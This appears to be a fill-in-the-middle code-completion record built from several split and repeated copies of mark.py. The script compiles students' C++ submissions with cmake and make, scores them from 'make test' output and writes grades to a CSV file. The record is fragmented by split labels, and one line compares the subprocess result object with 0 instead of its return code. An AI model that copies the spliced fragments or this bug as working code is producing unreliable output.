'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"]))
elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) )
elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
:returns: score
"""
test_ret = subprocess.run(["make", "test"], encoding='utf-8',
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = test_ret.stdout
errors = test_ret.stderr
lines = output.split('\n')
# find the line with the info we are looking for
i = 0
for idx, l in enumerate(lines):
if "% tests passed," in l:
i = idx
m = test_expr.search(lines[i])
if m:
perc, wrong, total = m.groups()
perc = float(perc) / 100 # percent
wrong = int(wrong)
total = int(total)
right = total - wrong
else:
print('\n'.join(lines))
right = int(input("Failed to parse score, input correct number manually: "))
total = int(input("Total tests: "))
comp = right / total
output = '\n'.join([lines[0]]+lines[2:])
return (100 * comp, output, right, total)
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submissions', type=str, required=True,
help="Directory containing student submissions")
ap.add_argument('-t', '--template', type=str, required=True,
help="Directory containing the assignment materials and tests")
ap.add_argument('-w', '--working', type=str, default='./tmp',
help="Temporary working directory")
ap.add_argument('-o', '--output', type=str, default='./output',
help="Directory where marked output is stored.")
# TODO: Add zip functionality
args=ap.parse_args()
args.submissions = os.path.abspath(args.submissions)
args.template = os.path.abspath(args.template)
args.working = os.path.abspath(args.working)
args.output = os.path.abspath(args.output)
# Check if necessary directories exist
if not os.path.isdir(args.submissions):
print("Submission directory does not exist", file=sys.stderr)
exit(1)
if not os.path.isdir(args.template):
print("Assignment template directory does not exist", file=sys.stderr)
exit(1)
if os.path.isdir(args.working):
shutil.rmtree(args.working)
os.mkdir(args.working)
if os.path.isdir(args.output):
shutil.rmtree(args.output)
os.mkdir(args.output)
# Run through each submission and try it
loadTmpDir(args.submissions, args.template, args.working, args.output)
shutil.rmtree(args.working)
if __name__ == "__main__":
main()
| os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
d | identifier_body |
mark.py | #!/bin/env python3
# Evan Wilde (c) 2017
# My big insane marking script of doom 😈
import argparse
import os
import sys
import csv
import re
import shutil
import subprocess
from subprocess import call
username_pattern = r".*\((.*)\)$"
username_expr = re.compile(username_pattern)
test_pattern = r"(100|[1-9][0-9]|[0-9])% tests passed, ([0-9]+) tests failed out of ([0-9]+)"
test_expr = re.compile(test_pattern)
## Helper Functions
# Deletes files in folder, it ignores filenames in ignore list
def removeFiles(folder, ignore=[], skipdirs=True):
"Deletes all files that are in folder"
for f in os.listdir(folder):
if f in ignore:
continue
try:
fpath = os.path.join(folder, f)
if os.path.isfile(fpath):
os.remove(fpath)
elif os.path.isdir(fpath) and not skipdirs:
shutil.rmtree(fpath)
except Exception as e:
print(f"Threw an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
def appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def getFiles(dirc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
wit | if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"]))
elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) )
elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
:returns: score
"""
test_ret = subprocess.run(["make", "test"], encoding='utf-8',
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = test_ret.stdout
errors = test_ret.stderr
lines = output.split('\n')
# find the line with the info we are looking for
i = 0
for idx, l in enumerate(lines):
if "% tests passed," in l:
i = idx
m = test_expr.search(lines[i])
if m:
perc, wrong, total = m.groups()
perc = float(perc) / 100 # percent
wrong = int(wrong)
total = int(total)
right = total - wrong
else:
print('\n'.join(lines))
right = int(input("Failed to parse score, input correct number manually: "))
total = int(input("Total tests: "))
comp = right / total
output = '\n'.join([lines[0]]+lines[2:])
return (100 * comp, output, right, total)
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submissions', type=str, required=True,
help="Directory containing student submissions")
ap.add_argument('-t', '--template', type=str, required=True,
help="Directory containing the assignment materials and tests")
ap.add_argument('-w', '--working', type=str, default='./tmp',
help="Temporary working directory")
ap.add_argument('-o', '--output', type=str, default='./output',
help="Directory where marked output is stored.")
# TODO: Add zip functionality
args=ap.parse_args()
args.submissions = os.path.abspath(args.submissions)
args.template = os.path.abspath(args.template)
args.working = os.path.abspath(args.working)
args.output = os.path.abspath(args.output)
# Check if necessary directories exist
if not os.path.isdir(args.submissions):
print("Submission directory does not exist", file=sys.stderr)
exit(1)
if not os.path.isdir(args.template):
print("Assignment template directory does not exist", file=sys.stderr)
exit(1)
if os.path.isdir(args.working):
shutil.rmtree(args.working)
os.mkdir(args.working)
if os.path.isdir(args.output):
shutil.rmtree(args.output)
os.mkdir(args.output)
# Run through each submission and try it
loadTmpDir(args.submissions, args.template, args.working, args.output)
shutil.rmtree(args.working)
if __name__ == "__main__":
main()
| h open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
| conditional_block |
mark.py | #!/bin/env python3
# Evan Wilde (c) 2017
# My big insane marking script of doom 😈
import argparse
import os
import sys
import csv
import re
import shutil
import subprocess
from subprocess import call
username_pattern = r".*\((.*)\)$"
username_expr = re.compile(username_pattern)
test_pattern = r"(100|[1-9][0-9]|[0-9])% tests passed, ([0-9]+) tests failed out of ([0-9]+)"
test_expr = re.compile(test_pattern)
## Helper Functions
# Deletes files in folder, it ignores filenames in ignore list
def removeFiles(folder, ignore=[], skipdirs=True):
"Deletes all files that are in folder"
for f in os.listdir(folder):
if f in ignore:
continue
try:
fpath = os.path.join(folder, f)
if os.path.isfile(fpath):
os.remove(fpath)
elif os.path.isdir(fpath) and not skipdirs:
shutil.rmtree(fpath)
except Exception as e:
print(f"Threw an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
def appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def get | rc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"]))
elif cidx == 7:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>", "=== [Test Output] =============",
output, "</pre>"]) )
elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
:returns: score
"""
test_ret = subprocess.run(["make", "test"], encoding='utf-8',
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = test_ret.stdout
errors = test_ret.stderr
lines = output.split('\n')
# find the line with the info we are looking for
i = 0
for idx, l in enumerate(lines):
if "% tests passed," in l:
i = idx
m = test_expr.search(lines[i])
if m:
perc, wrong, total = m.groups()
perc = float(perc) / 100 # percent
wrong = int(wrong)
total = int(total)
right = total - wrong
else:
print('\n'.join(lines))
right = int(input("Failed to parse score, input correct number manually: "))
total = int(input("Total tests: "))
comp = right / total
output = '\n'.join([lines[0]]+lines[2:])
return (100 * comp, output, right, total)
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submissions', type=str, required=True,
help="Directory containing student submissions")
ap.add_argument('-t', '--template', type=str, required=True,
help="Directory containing the assignment materials and tests")
ap.add_argument('-w', '--working', type=str, default='./tmp',
help="Temporary working directory")
ap.add_argument('-o', '--output', type=str, default='./output',
help="Directory where marked output is stored.")
# TODO: Add zip functionality
args=ap.parse_args()
args.submissions = os.path.abspath(args.submissions)
args.template = os.path.abspath(args.template)
args.working = os.path.abspath(args.working)
args.output = os.path.abspath(args.output)
# Check if necessary directories exist
if not os.path.isdir(args.submissions):
print("Submission directory does not exist", file=sys.stderr)
exit(1)
if not os.path.isdir(args.template):
print("Assignment template directory does not exist", file=sys.stderr)
exit(1)
if os.path.isdir(args.working):
shutil.rmtree(args.working)
os.mkdir(args.working)
if os.path.isdir(args.output):
shutil.rmtree(args.output)
os.mkdir(args.output)
# Run through each submission and try it
loadTmpDir(args.submissions, args.template, args.working, args.output)
shutil.rmtree(args.working)
if __name__ == "__main__":
main()
| Files(di | identifier_name |
mark.py | #!/bin/env python3
# Evan Wilde (c) 2017
# My big insane marking script of doom 😈
import argparse
import os
import sys
import csv
import re
import shutil
import subprocess
from subprocess import call
username_pattern = r".*\((.*)\)$"
username_expr = re.compile(username_pattern)
test_pattern = r"(100|[1-9][0-9]|[0-9])% tests passed, ([0-9]+) tests failed out of ([0-9]+)"
test_expr = re.compile(test_pattern)
## Helper Functions
# Deletes files in folder, it ignores filenames in ignore list
def removeFiles(folder, ignore=[], skipdirs=True):
"Deletes all files that are in folder"
for f in os.listdir(folder):
if f in ignore:
continue
try:
fpath = os.path.join(folder, f)
if os.path.isfile(fpath):
os.remove(fpath)
elif os.path.isdir(fpath) and not skipdirs:
shutil.rmtree(fpath)
except Exception as e:
print(f"Threw an exception {e}")
# from, to (copies all files in from, to the to dir)
def copyContents(f, t):
"Copy all files in f into t dir"
[shutil.copy(os.path.join(f, p), t)
if os.path.isfile(os.path.join(f, p))
else shutil.copytree(os.path.join(f, p), os.path.join(t, p))
for p in os.listdir(f)]
## Viewer Modes
def editFile(fname):
if os.environ.get('EDITOR'):
subprocess.run([os.environ.get("EDITOR"), fname])
else: # Rudimentary backup editor
lines = []
while True:
try:
line = input(">>>")
except EOFError:
break
lines.append(line)
contents = '\n'.join(lines)
with open(fname, 'w') as FILE:
FILE.write(contents)
print("\r", end='')
def appendToFile(fname, content):
with open(fname, 'a+') as FILE:
FILE.write(content)
# Show stuff
def viewData(content):
PAGER = os.environ.get('PAGER')
if PAGER and len(content.split('\n')) > 20:
if PAGER == 'less':
subprocess.run([os.environ.get("PAGER"), '-N'], input=content.encode('utf-8'))
else:
subprocess.run([os.environ.get("PAGER")], input=content.encode('utf-8'))
else:
os.system("clear")
print(content)
# Read a file and show it
def viewFile(fname):
if os.path.isfile(fname):
with open(fname, 'r') as FILE:
viewData(FILE.read())
# Get files in a directory
def getFiles(dirc):
return [x for x in os.listdir(dirc) if x is not os.path.isdir(x)]
# Prompt user to select an item
def selectItems(itms):
prmt = '\t' + '\n\t'.join([f"({num+1}): {nm}"
for num, nm in enumerate(itms)]) + '\n [1] >>: '
while True:
i = input(prmt)
if i == '':
return (0, itms[0])
try:
select = int(i)
except ValueError:
continue
if select <= len(itms) and select > 0:
return (select-1, itms[select-1])
## Main Functions
def loadTmpDir(submissiondir, assndir, tmpdir, outputdir):
"""Load user submission to staging area
Loads the testing files into the tmpdir
Will create build folder and cd into that for compiling and marking
Calls the compile and marking functions.
If the program does not compile, the submission receives a zero and is not
passed forward to marking.
:rootdir: The root directory where the assignments are (directory with
student names)
:tmpdir: Where compilation and marking are occurring
:assndir: location where original assignment is kept
"""
# Deals with the joys of connex BS
# Copy and open grade file
in_gradefname = os.path.join(submissiondir, 'grades.csv')
out_gradefname = os.path.join(outputdir, 'grades.csv')
if not os.path.exists(in_gradefname):
print("grade.csv doesn't exist", "Re-download submissions from Connex with grade.csv included", sep="\n", file=sys.stderr)
exit(1)
with open(in_gradefname, 'r') as gradeFile:
gradeReader = csv.reader(gradeFile, delimiter=',')
l = [row for row in gradeReader]
header = l[:3]
order = [stud[1] for stud in l[3:]]
details = {stud[1]: stud for stud in l[3:]}
submissions = {username_expr.search(p).groups()[0]: p for p in os.listdir(submissiondir) if username_expr.search(p)}
assert len(details) == len(submissions) # If these don't match, panic
cwd = os.getcwd() # Store this so we can go back to it later
# And here we go with actually driving this stupid boat
for idx, f in enumerate(details):
submission_path = os.path.join(submissiondir, submissions[f], "Submission attachment(s)")
output_path = os.path.join(outputdir, submissions[f])
# If it has already been marked, show the marks and copy the comments file
if details[f][-1]:
if os.path.isfile(os.path.join(submissiondir, submissions[f], 'comments.txt')):
shutil.copy(os.path.join(submissiondir, submissions[f], 'comments.txt'), tmpdir)
resp = input(f"{f}[{details[f][-1]}] already marked: Remark? [y/N]:")
if resp.lower() != 'y':
# Copy comment file
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
continue
copyContents(submission_path, tmpdir)
copyContents(assndir, tmpdir) # Will overwrite anything already there
if not os.path.isdir(os.path.join(tmpdir, 'build')):
os.mkdir(os.path.join(tmpdir, 'build'))
os.chdir(os.path.join(tmpdir, 'build'))
compiled, compile_msg = cpp_compile() # compile submission
if compiled:
score, output, correct, total = mark()
else:
score = 0
output = "Failed to compile"
correct = 0
total = 0
# Okay, back to the workdir for comments and shipping the mark
os.chdir(tmpdir)
options = ["Keep",
"Comment",
"Replace Grade",
"Show Compiler Output",
"Show Test Output",
"Show Comment",
"Append compiler message",
"Append Test Output",
"View Submission"]
while True:
print(f"""Marking {submissions[f]}:
Student {idx+1} / {len(details)}
Mark: {score} ({correct} / {total})""")
cidx, cmd = selectItems(options)
if cidx == 0:
break
elif cidx == 1: # Comment on file
editFile(os.path.abspath("./comments.txt"))
continue
elif cidx == 2: # Change grade
score = round(float(input("New Grade: ")), 2)
continue
elif cidx == 3:
viewData(compile_msg)
elif cidx == 4:
viewData(output)
elif cidx == 5:
viewFile(os.path.abspath("./comments.txt"))
elif cidx == 6:
appendToFile(os.path.abspath("./comments.txt"),
'\n'.join(["\n<pre>","=== [Compiler Output] =========",
compile_msg, "</pre>"])) | elif cidx == 8:
submittedFiles = getFiles(submission_path)
if len(submittedFiles) > 1:
_, fname = selectItems(submittedFiles)
else:
fname = submittedFiles[0]
viewFile(os.path.abspath("./" + fname))
else:
print(cidx, cmd)
# Once everything is hunky dory, put away their mark and move on
details[f][-1] = score
if not os.path.isfile(os.path.abspath("./comments.txt")):
with open(os.path.abspath("./comments.txt"), 'w'):
pass # Just create it and leave
if not os.path.isdir(output_path):
os.mkdir(output_path)
shutil.copy(os.path.abspath("./comments.txt"),
os.path.join(output_path, "comments.txt"))
removeFiles(os.path.join(tmpdir, "build"), skipdirs=False)
shutil.rmtree(os.path.join(tmpdir, "tests"))
removeFiles(tmpdir, skipdirs=False)
os.chdir(cwd)
# Write grades to grade file
with open(out_gradefname, "w") as outputgrades:
csv_writer = csv.writer(outputgrades, dialect='unix')
[csv_writer.writerow(el) for el in header]
[csv_writer.writerow(details[stud]) for stud in order]
return details
# Compile submission
def cpp_compile(threads=2):
"""Compile the user submission
CMakeLists.txt should be in the cwd
:returns: True/False depending on if the program compiles
"""
cmake_ret = subprocess.run(["cmake", "../"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = cmake_ret.stdout
errors = cmake_ret.stderr
output = ""
errors = ""
make_ret = subprocess.run(["make", f"-j{threads}"], encoding='utf-8', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = make_ret.stdout
errors = make_ret.stderr
return (make_ret.returncode == 0, errors if make_ret != 0 else None)
# Mark submission loaded in tmp dir
def mark():
"""Mark student submissions using the test file
Runs "make test" in cwd
:returns: score
"""
test_ret = subprocess.run(["make", "test"], encoding='utf-8',
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = test_ret.stdout
errors = test_ret.stderr
lines = output.split('\n')
# find the line with the info we are looking for
i = 0
for idx, l in enumerate(lines):
if "% tests passed," in l:
i = idx
m = test_expr.search(lines[i])
if m:
perc, wrong, total = m.groups()
perc = float(perc) / 100 # percent
wrong = int(wrong)
total = int(total)
right = total - wrong
else:
print('\n'.join(lines))
right = int(input("Failed to parse score, input correct number manually: "))
total = int(input("Total tests: "))
comp = right / total
output = '\n'.join([lines[0]]+lines[2:])
return (100 * comp, output, right, total)
def main():
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submissions', type=str, required=True,
help="Directory containing student submissions")
ap.add_argument('-t', '--template', type=str, required=True,
help="Directory containing the assignment materials and tests")
ap.add_argument('-w', '--working', type=str, default='./tmp',
help="Temporary working directory")
ap.add_argument('-o', '--output', type=str, default='./output',
help="Directory where marked output is stored.")
# TODO: Add zip functionality
args=ap.parse_args()
args.submissions = os.path.abspath(args.submissions)
args.template = os.path.abspath(args.template)
args.working = os.path.abspath(args.working)
args.output = os.path.abspath(args.output)
# Check if necessary directories exist
if not os.path.isdir(args.submissions):
print("Submission directory does not exist", file=sys.stderr)
exit(1)
if not os.path.isdir(args.template):
print("Assignment template directory does not exist", file=sys.stderr)
exit(1)
if os.path.isdir(args.working):
shutil.rmtree(args.working)
